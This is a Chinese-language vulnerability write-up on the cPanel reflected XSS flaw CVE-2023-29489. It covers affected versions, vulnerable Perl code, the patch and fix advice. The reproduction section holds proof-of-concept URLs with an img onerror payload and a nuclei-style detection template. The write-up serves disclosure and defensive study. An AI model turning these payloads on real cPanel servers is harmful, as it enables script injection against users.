cPanel XSS漏洞分析研究（CVE-2023-29489）-有解無憂

一、漏洞原理

漏洞簡述

cPanel 是一套在網頁寄存業中最享負盛名的商業軟體，是基于于 Linux 和 BSD 系統及以 PHP 開發且性質為閉源軟體；提供了足夠強大和相當完整的主機管理功能，諸如：Webmail 及多種電郵協議、網頁化 FTP 管理、SSH 連線、資料庫管理系統、DNS 管理等遠端網頁式主機管理軟體功能，

該漏洞可以無身份驗證情況下利用，無論cPanel管理埠2080, 2082, 2083, 2086是否對外開放

漏洞影響范圍

供應商：cPanel

產品：cPanel

確認受影響版本：< 11.109.9999.116

修復版本：11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31

漏洞分析

本漏洞的漏洞點來自系統中涉及互動的關鍵變數未進行轉義或過濾處理，導致攻擊者可以構造惡意代碼作為輸入進行利用，

Httpd.pm：

elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {
?
    # First 15 chars are “/cpanelwebcall/”
    _serve_cpanelwebcall(
        $self->get_server_obj(),
        substr( $doc_path, 15 ),
    );
}

上述代碼說明任何路徑均會被路由到，包括目錄后的字符部分，

其中涉及函式_serve_cpanelwebcall：

sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
    require Cpanel::Server::WebCalls;
    my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);
?
    $server_obj->respond_200_ok_text($out);
    
    return;
?
}

其中區域變數out為handle函式的回傳值，是引數webcall_uri_piece的處理結果，

sub handle ($request) {
?
    my $id = extract_id_from_request($request);
    substr( $request, 0, length $id ) = q<>;
?
    Cpanel::WebCalls::ID::is_valid($id) or do {
        die _http_invalid_params_err("Invalid webcall ID: $id");
    };

handle函式主要先從request提取id，之后根據id情況進行處理

sub _http_invalid_params_err ($why) {
    return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
}

_http_invalid_params_err函式主要是回傳錯誤資訊

進一步分析發現Httpd::ErrorPage下的 message_html變數未做任何處理，可被該漏洞利用

【----幫助網安學習，以下所有學習資料免費領！加vx：yj009991，備注 “博客園” 獲取！】

　① 網安學習成長路徑思維導圖
　② 60+網安經典常用工具包
　③ 100+SRC漏洞分析報告
　④ 150+網安攻防實戰技術電子書
　⑤ 最權威CISSP 認證考試指南+題庫
　⑥ 超1800頁CTF實戰技巧手冊
　⑦ 最新網安大廠面試題合集（含答案）
　⑧ APP客戶端安全檢測指南（安卓+IOS）

補丁部分

在最新版本cPanel可以看到針對該漏洞進行修復

Cpanel/Server/Handlers/Httpd/ErrorPage.pm：

++ use Cpanel::Encoder::Tiny               ();  
?
... omitted for brevity ...
?
++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );

二、漏洞復現實戰

漏洞復現

首先以某個cPanel target為例

cPanel資產

之后根據POC進行復現

POC：

http://example.com/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa

注：其他埠也有可能存在該漏洞

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa'
    matchers:
      - type: word
        words:
          - '<img src=https://www.cnblogs.com/hetianlab/p/x one rror="prompt(1)">'

執行POC

XSS POC執行情況

漏洞修復

建議更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31

啟用cPanel 自動更新功能

結束語

本文主要介紹了CVE-2023-29489 cPanel XSS漏洞的原理分析及復現程序，漏洞主要由于涉及互動的關鍵變數未進行轉義或過濾處理，從而造成攻擊者可以在無身份驗證情況下進行利用，

更多網安技能的在線實操練習，請點擊這里>>

合天智匯：合天網路靶場、網安實戰虛擬環境

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/551612.html

標籤：其他

上一篇：再一次，實作聽歌自由

下一篇：返回列表